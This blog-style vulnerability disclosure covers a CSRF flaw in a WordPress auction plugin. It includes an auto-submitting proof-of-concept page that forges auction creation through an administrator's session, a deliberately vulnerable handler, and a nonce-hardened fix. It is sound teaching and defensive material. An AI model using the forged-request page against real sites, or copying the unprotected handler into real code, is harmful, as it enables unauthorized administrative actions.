Most CMSs seem vulnerable to CSRF attacks these days. The Ultimate WordPress Auction plugin is a really good concept, but it suffers from a CSRF vulnerability which, when exploited, lets an attacker add fake auctions through a logged-in administrator's browser, which obviously we don't want!
Vulnerable URL:
http://127.0.0.1/wordpress-3.5.1/wordpress/wp-admin/admin.php?page=add-new-auction
If you study the page source closely, there is no action URL specified in the FORM tag.
[Screenshot: the form tag with no action URL]
When a form has no action attribute, the browser submits it to the URL of the page it is on, so this form posts its fields back to admin.php?page=add-new-auction itself. That is all a CSRF page needs: it posts the same fields to that same URL from another origin, the victim's browser attaches the administrator's session cookies, and nothing in the request proves that the administrator intended it. I crafted a CSRF exploit with that target URL and it worked well.
[Screenshot: the CSRF exploit page loading]
[Screenshot: fake auction added by the attacker]
I hope the author patches this soon. For a WordPress plugin the standard fix is to emit a nonce in the form with wp_nonce_field() and verify it with check_admin_referer() before saving, together with a capability check on the current user. The aim here is to raise awareness of web exploitation and how it is done in a practical environment, so that application developers are more careful while coding.
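As an added illustration (not the plugin's own code, and not the exact exploit page from the screenshots), the PHP below shows the pattern described above in one file: the attacker's auto-submitting page that targets the admin URL, the vulnerable page callback with an action-less form whose handler trusts any POST, and the same callback hardened with a WordPress nonce and a capability check. The field names auction_title and starting_price, the nonce action/name strings, the 'auction' post type and the manage_options capability are assumptions made for the example.

```php
<?php
/*
 * Added example, not the plugin's code. Assumed names: auction_title,
 * starting_price, post type 'auction', nonce action 'uwa_add_auction',
 * nonce field 'uwa_auction_nonce', capability 'manage_options'.
 */

/* ---- 1. Attacker's page (host it on any other origin, lure the admin) ---- */
// A form with no action submits to the page it is on, so the plugin page
// posts to admin.php?page=add-new-auction itself. The attacker posts the
// same fields to that same URL; the victim's browser adds the admin cookies.
function uwa_csrf_poc_html() {
    return <<<'HTML'
<html><body onload="document.forms[0].submit()">
<form method="POST"
      action="http://127.0.0.1/wordpress-3.5.1/wordpress/wp-admin/admin.php?page=add-new-auction">
  <input type="hidden" name="auction_title"  value="Fake auction">
  <input type="hidden" name="starting_price" value="1">
</form>
</body></html>
HTML;
}

/* ---- Shared save helper (assumed storage: an 'auction' custom post) ---- */
function uwa_save_auction( $title, $price ) {
    $id = wp_insert_post( array(
        'post_type'   => 'auction',
        'post_title'  => $title,
        'post_status' => 'publish',
    ) );
    if ( $id && ! is_wp_error( $id ) ) {
        update_post_meta( $id, 'starting_price', $price );
    }
    return $id;
}

/* ---- 2. Vulnerable page callback (the pattern the post describes) ---- */
function vuln_add_new_auction_page() {
    if ( isset( $_POST['auction_title'] ) ) {
        // Nothing ties this request to the admin's session or intent:
        // any cross-site POST made by the admin's browser gets saved.
        uwa_save_auction( $_POST['auction_title'], $_POST['starting_price'] );
    }
    ?>
    <form method="post"> <!-- no action: submits back to this admin page -->
        <input type="text" name="auction_title">
        <input type="text" name="starting_price">
        <input type="submit" value="Add auction">
    </form>
    <?php
}

/* ---- 3. Hardened page callback ---- */
function safe_add_new_auction_page() {
    if ( isset( $_POST['auction_title'] ) ) {
        // Verifies the nonce and calls wp_die() if it is missing or invalid,
        // so execution never reaches the save on a forged request.
        check_admin_referer( 'uwa_add_auction', 'uwa_auction_nonce' );
        // The nonce proves intent, not authority: still check the capability.
        if ( ! current_user_can( 'manage_options' ) ) {
            wp_die( 'You are not allowed to add auctions.' );
        }
        uwa_save_auction(
            sanitize_text_field( wp_unslash( $_POST['auction_title'] ) ),
            floatval( $_POST['starting_price'] )
        );
    }
    ?>
    <form method="post"
          action="<?php echo esc_url( admin_url( 'admin.php?page=add-new-auction' ) ); ?>">
        <?php wp_nonce_field( 'uwa_add_auction', 'uwa_auction_nonce' ); ?>
        <input type="text" name="auction_title">
        <input type="text" name="starting_price">
        <input type="submit" value="Add auction">
    </form>
    <?php
}
```

Despite its name, check_admin_referer() validates the nonce (via wp_verify_nonce()), not the HTTP Referer header, and the nonce is bound to the logged-in user and session, so a page on another origin cannot obtain or guess it. A nonce only shows the user meant to submit this form; it says nothing about whether they are allowed to, which is why the current_user_can() check stays.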